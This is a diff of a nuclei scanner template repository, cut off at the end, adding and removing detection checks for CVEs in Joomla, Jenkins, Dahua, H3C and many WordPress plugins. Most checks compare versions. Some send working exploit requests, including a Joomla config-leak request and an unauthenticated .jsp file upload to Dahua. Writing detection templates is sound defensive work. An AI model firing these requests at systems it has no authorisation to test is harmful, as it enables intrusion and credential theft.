matchers: + - type: word + part: body + words: + - 'var syspasswd="' + - 'APP' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + regex: + - 'syspasswd="(.+?)"' diff --git a/nuclei-templates/CVE-2022/cve-2022-35416.yaml b/nuclei-templates/CVE-2022/cve-2022-35416.yaml new file mode 100644 index 0000000000..90b8578414 --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-35416.yaml @@ -0,0 +1,46 @@ +id: CVE-2022-35416 + +info: + name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting + author: 0x240x23elu + severity: medium + description: | + H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang. + reference: + - https://github.com/advisories/GHSA-9x76-78gc-r3m9 + - https://github.com/Docker-droid/H3C_SSL_VPN_XSS + - https://nvd.nist.gov/vuln/detail/CVE-2022-35416 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-35416 + cwe-id: CWE-79 + metadata: + shodan-query: http.html_hash:510586239 + verified: "true" + tags: cve,cve2022,xss,vpn,h3c + +requests: + - raw: + - | + GET /wnm/login/login.json HTTP/1.1 + Host: {{Hostname}} + Cookie: svpnlang= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/09/14 diff --git a/nuclei-templates/CVE-2022/cve-2022-36883.yaml b/nuclei-templates/CVE-2022/cve-2022-36883.yaml new file mode 100644 index 0000000000..56ea8fccfa --- /dev/null +++ b/nuclei-templates/CVE-2022/cve-2022-36883.yaml @@ -0,0 +1,38 @@ +id: CVE-2022-36883 + +info: + name: Git Plugin up to 4.11.3 on Jenkins Build Authorization + author: c-sh0 + severity: high + description: A missing permission check in Jenkins Git Plugin 4.11.3 and earlier allows unauthenticated attackers to trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. + reference: + - https://www.jenkins.io/security/advisory/2022-07-27/#SECURITY-284 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-36883 + - https://nvd.nist.gov/vuln/detail/CVE-2022-36883 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2022-36883 + cwe-id: CWE-862 + metadata: + shodan-query: X-Jenkins + verified: "true" + tags: cve,cve2022,jenkins,plugin,git + +requests: + - method: GET + path: + - "{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "repository:" + - "SCM API plugin" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2023/CVE-2023-23752.yaml b/nuclei-templates/CVE-2023/CVE-2023-23752.yaml deleted file mode 100644 index 7d7b738f04..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-23752.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2023-23752 - -info: - name: Joomla Webservice Endpoint access control - author: thecyberneh - description: An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. - severity: high - tags: cves - -requests: - - method: GET - path: - - "{{BaseURL}}/api/index.php/v1/config/application?public=true" - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "password" - - - type: word - part: body - words: - - "application" - - - type: word - part: body - words: - - "attributes" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2023/CVE-2023-35047.yaml b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml new file mode 100644 index 0000000000..a8e1f1a930 --- /dev/null +++ b/nuclei-templates/CVE-2023/CVE-2023-35047.yaml @@ -0,0 +1,56 @@ +id: CVE-2023-35047 + +info: + name: "All Bootstrap Blocks <= 1.3.6 - Cross-Site Request Forgery to Plugin Settings Reset" + author: topscoder + severity: medium + description: "The All Bootstrap Blocks plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.3.6. This is due to missing nonce validation on the reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." + reference: + - https://www.wordfence.com/threat-intel/vulnerabilities/id/4a7a15ab-4f13-4eb1-aeb5-143230308871?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L + cvss-score: 6.5 + cve-id: CVE-2023-35047 + metadata: + fofa-query: "wp-content/plugins/all-bootstrap-blocks/" + google-query: inurl:"/wp-content/plugins/all-bootstrap-blocks/" + shodan-query: 'vuln:CVE-2023-35047' + tags: cve,wordpress,wp-plugin,all-bootstrap-blocks,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-bootstrap-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-bootstrap-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.6') diff --git a/nuclei-templates/CVE-2023/CVE-2023-3836.yaml b/nuclei-templates/CVE-2023/CVE-2023-3836.yaml deleted file mode 100644 index 0e3e21c1d4..0000000000 --- a/nuclei-templates/CVE-2023/CVE-2023-3836.yaml +++ /dev/null @@ -1,68 +0,0 @@ -id: CVE-2023-3836 - -info: - name: Dahua Smart Park Management - Arbitrary File Upload - author: HuTa0 - severity: critical - description: | - Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?. - remediation: | - Apply the latest security patch or update provided by the vendor to fix the arbitrary file upload vulnerability. - reference: - - https://github.com/qiuhuihk/cve/blob/main/upload.md - - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - - https://vuldb.com/?ctiid.235162 - - https://vuldb.com/?id.235162 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2023-3836 - cwe-id: CWE-434 - epss-score: 0.02584 - epss-percentile: 0.89161 - cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* - metadata: - verified: true - max-request: 2 - vendor: dahuasecurity - product: smart_parking_management - shodan-query: html:"/WPMS/asset" - zoomeye-query: /WPMS/asset - tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity -variables: - random_str: "{{rand_base(6)}}" - match_str: "{{md5(random_str)}}" - -http: - - raw: - - | - POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 - Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Host: {{Hostname}} - - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT - Content-Disposition: form-data; name="upload"; filename="{{random_str}}.jsp" - Content-Type: application/octet-stream - Content-Transfer-Encoding: binary - - {{match_str}} - --A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- - - | - GET /upload/emap/society_new/{{shell_filename}} HTTP/1.1 - Host: {{Hostname}} - - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && status_code_2 == 200" - - "contains(body_2, '{{match_str}}')" - condition: and - - extractors: - - type: regex - name: shell_filename - internal: true - part: body_1 - regex: - - 'ico_res_(\w+)_on\.jsp' -# digest: 490a00463044022019ed3a01869b520c888624caac663690abb0239bbe29ce2bd37bf0c9da3ceed102203bb8f2aef38ca4aa0349fe47f7a0e72a004678a13fb247d0ebd2abfbea426827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2023/Cve-2023-23752.yaml b/nuclei-templates/CVE-2023/Cve-2023-23752.yaml new file mode 100644 index 0000000000..5cdbcf0506 --- /dev/null +++ b/nuclei-templates/CVE-2023/Cve-2023-23752.yaml @@ -0,0 +1,57 @@ +id: CVE-2023-23752 + +info: + name: Joomla! Webservice - Password Disclosure + author: badboycxcc,Sascha Brendel + severity: medium + description: | + An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints. + remediation: Upgrade to Joomla! version 4.2.8 or later. + reference: + - https://unsafe.sh/go-149780.html + - https://twitter.com/gov_hack/status/1626471960141238272/photo/1 + - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html + - https://nvd.nist.gov/vuln/detail/CVE-2023-23552 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2023-23752 + epss-score: 0.70036 + epss-percentile: 0.97685 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 2 + vendor: joomla + product: joomla\! + shodan-query: html:"Joomla! - Open Source Content Management" + tags: cve,cve2023,joomla + +http: + - method: GET + path: + - '{{BaseURL}}/api/index.php/v1/config/application?public=true' + - '{{BaseURL}}/api/v1/config/application?public=true' + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"links":' + - '"attributes":' + condition: and + + - type: word + part: header + words: + - 'application/json' + - 'application/vnd.api+json' + condition: or + + - type: status + status: + - 200 +# digest: 4a0a00473045022100c1c30199254120237edebfcf5a43ddebc667fd98b7ae59cf38479d77d0b3783e022033b70e3a0709b48722717747cd4dd57191b549d785b53dcb67fb00fefb6183e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/gradio-CVE-2024-1561.yaml b/nuclei-templates/CVE-2024/CVE-2024-1561.yaml similarity index 100% rename from nuclei-templates/Other/gradio-CVE-2024-1561.yaml rename to nuclei-templates/CVE-2024/CVE-2024-1561.yaml diff --git a/nuclei-templates/CVE-2024/cve-2024-23897.yaml b/nuclei-templates/CVE-2024/CVE-2024-23897.yaml similarity index 100% rename from nuclei-templates/CVE-2024/cve-2024-23897.yaml rename to nuclei-templates/CVE-2024/CVE-2024-23897.yaml diff --git a/nuclei-templates/CVE-2024/CVE-2024-38693.yaml b/nuclei-templates/CVE-2024/CVE-2024-38693.yaml new file mode 100644 index 0000000000..ecd61ec3cc --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-38693.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-38693 + +info: + name: > + WP User Frontend <= 4.0.7 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The WP User Frontend plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in versions up to, and including, 4.0.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d2fdd6eb-c848-446c-abad-7d2ea93f5512?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-38693 + metadata: + fofa-query: "wp-content/plugins/wp-user-frontend/" + google-query: inurl:"/wp-content/plugins/wp-user-frontend/" + shodan-query: 'vuln:CVE-2024-38693' + tags: cve,wordpress,wp-plugin,wp-user-frontend,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-user-frontend/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-user-frontend" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.7') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml b/nuclei-templates/CVE-2024/CVE-2024-38856.yaml index 1c301d3a01..2aa43a804b 100644 --- a/nuclei-templates/CVE-2024/CVE-2024-38856.yaml +++ b/nuclei-templates/CVE-2024/CVE-2024-38856.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 fofa-query: app="Apache_OFBiz" - tags: cve,cve2024,ofbiz,apache,rce + tags: cve,cve2024,ofbiz,apache,rce,kev http: - raw: diff --git a/nuclei-templates/CVE-2024/CVE-2024-39641.yaml b/nuclei-templates/CVE-2024/CVE-2024-39641.yaml new file mode 100644 index 0000000000..b63b4aa1ff --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39641.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39641 + +info: + name: > + LearnPress <= 4.2.6.8.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.6.8.2. This is due to missing or incorrect nonce validation on an unknown function. This makes it possible for unauthenticated attackers to perform an unknown action granted they can trick a site administrator into performing an action such as clicking on a link. The impact of this vulnerability is unknown. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/52d6f0c3-2e2e-44cb-a5ea-85c19424ddac?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-39641 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-39641' + tags: cve,wordpress,wp-plugin,learnpress,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.6.8.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39642.yaml b/nuclei-templates/CVE-2024/CVE-2024-39642.yaml new file mode 100644 index 0000000000..d9224ed440 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39642.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39642 + +info: + name: > + LearnPress <= 4.2.6.8.2 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.6.8.2 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7449ed1e-cc09-4b8b-8226-7cdc70be2b36?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-39642 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-39642' + tags: cve,wordpress,wp-plugin,learnpress,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.6.8.2') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39643.yaml b/nuclei-templates/CVE-2024/CVE-2024-39643.yaml new file mode 100644 index 0000000000..004cfb6a53 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39643.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39643 + +info: + name: > + RegistrationMagic <= 6.0.0.1 - Unauthenticated Stored Cross-Site Scripting + author: topscoder + severity: high + description: > + The RegistrationMagic – User Registration Plugin with Custom Registration Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 6.0.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/41985e86-eda4-4914-a7f8-3758afcc6193?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cve-id: CVE-2024-39643 + metadata: + fofa-query: "wp-content/plugins/custom-registration-form-builder-with-submission-manager/" + google-query: inurl:"/wp-content/plugins/custom-registration-form-builder-with-submission-manager/" + shodan-query: 'vuln:CVE-2024-39643' + tags: cve,wordpress,wp-plugin,custom-registration-form-builder-with-submission-manager,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-registration-form-builder-with-submission-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-registration-form-builder-with-submission-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.0.0.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39646.yaml b/nuclei-templates/CVE-2024/CVE-2024-39646.yaml new file mode 100644 index 0000000000..9b7dec9b05 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39646.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39646 + +info: + name: > + Custom 404 Pro <= 3.11.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Custom 404 Pro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'c4pmessageType' and 'c4pmessage' parameters in versions up to, and including, 3.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/724a7579-74c6-46b2-b1b4-a92e980aaa83?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-39646 + metadata: + fofa-query: "wp-content/plugins/custom-404-pro/" + google-query: inurl:"/wp-content/plugins/custom-404-pro/" + shodan-query: 'vuln:CVE-2024-39646' + tags: cve,wordpress,wp-plugin,custom-404-pro,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-404-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-404-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.11.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39647.yaml b/nuclei-templates/CVE-2024/CVE-2024-39647.yaml new file mode 100644 index 0000000000..306479a196 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39647.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39647 + +info: + name: > + Message Filter for Contact Form 7 <= 1.6.1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'form' parameter in all versions up to, and including, 1.6.1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/31ed0d2a-94bc-4526-9d21-6f2f544696d2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-39647 + metadata: + fofa-query: "wp-content/plugins/cf7-message-filter/" + google-query: inurl:"/wp-content/plugins/cf7-message-filter/" + shodan-query: 'vuln:CVE-2024-39647' + tags: cve,wordpress,wp-plugin,cf7-message-filter,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cf7-message-filter/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cf7-message-filter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.6.1.1') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39648.yaml b/nuclei-templates/CVE-2024/CVE-2024-39648.yaml new file mode 100644 index 0000000000..c469fc54e5 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39648.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39648 + +info: + name: > + Eventin <= 4.0.5 - Authenticated (Author+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Eventin plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 4.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b5451529-2e3f-414e-884e-cc6761431262?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-39648 + metadata: + fofa-query: "wp-content/plugins/wp-event-solution/" + google-query: inurl:"/wp-content/plugins/wp-event-solution/" + shodan-query: 'vuln:CVE-2024-39648' + tags: cve,wordpress,wp-plugin,wp-event-solution,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-event-solution/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-event-solution" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.5') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39649.yaml b/nuclei-templates/CVE-2024/CVE-2024-39649.yaml new file mode 100644 index 0000000000..dd57158fd8 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39649.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39649 + +info: + name: > + Essential Addons for Elementor <= 5.9.26 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Essential Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.9.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/eee7cad6-7910-4860-add9-c500d1f6eff3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-39649 + metadata: + fofa-query: "wp-content/plugins/essential-addons-for-elementor-lite/" + google-query: inurl:"/wp-content/plugins/essential-addons-for-elementor-lite/" + shodan-query: 'vuln:CVE-2024-39649' + tags: cve,wordpress,wp-plugin,essential-addons-for-elementor-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "essential-addons-for-elementor-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.9.26') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39651.yaml b/nuclei-templates/CVE-2024/CVE-2024-39651.yaml new file mode 100644 index 0000000000..6cd642f71e --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39651.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39651 + +info: + name: > + WooCommerce PDF Vouchers <= 4.9.4 - Unauthenticated Arbitrary File Deletion + author: topscoder + severity: critical + description: > + The WooCommerce - PDF Vouchers plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in a function in all versions up to, and including, 4.9.4. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php). + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3ccde73-8b88-48f9-8bbd-0392fcc40c81?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H + cvss-score: 9.1 + cve-id: CVE-2024-39651 + metadata: + fofa-query: "wp-content/plugins/woocommerce-pdf-vouchers/" + google-query: inurl:"/wp-content/plugins/woocommerce-pdf-vouchers/" + shodan-query: 'vuln:CVE-2024-39651' + tags: cve,wordpress,wp-plugin,woocommerce-pdf-vouchers,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-vouchers/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-pdf-vouchers" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39652.yaml b/nuclei-templates/CVE-2024/CVE-2024-39652.yaml new file mode 100644 index 0000000000..67592b9bc1 --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39652.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39652 + +info: + name: > + WooCommerce PDF Vouchers <= 4.9.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The WooCommerce - PDF Vouchers plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 4.9.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/19286e18-f30d-40e8-80fa-cd1b4d065f80?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-39652 + metadata: + fofa-query: "wp-content/plugins/woocommerce-pdf-vouchers/" + google-query: inurl:"/wp-content/plugins/woocommerce-pdf-vouchers/" + shodan-query: 'vuln:CVE-2024-39652' + tags: cve,wordpress,wp-plugin,woocommerce-pdf-vouchers,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-vouchers/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-pdf-vouchers" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.4') \ No newline at end of file diff --git a/nuclei-templates/CVE-2024/CVE-2024-39653.yaml b/nuclei-templates/CVE-2024/CVE-2024-39653.yaml new file mode 100644 index 0000000000..c02df5554c --- /dev/null +++ b/nuclei-templates/CVE-2024/CVE-2024-39653.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-39653 + +info: + name: > + VikRentCar <= 1.4.0 - Unauthenticated SQL Injection + author: topscoder + severity: critical + description: > + The VikRentCar plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.4.0 due to insufficient escaping on the user supplied parameter and lack of sufficient 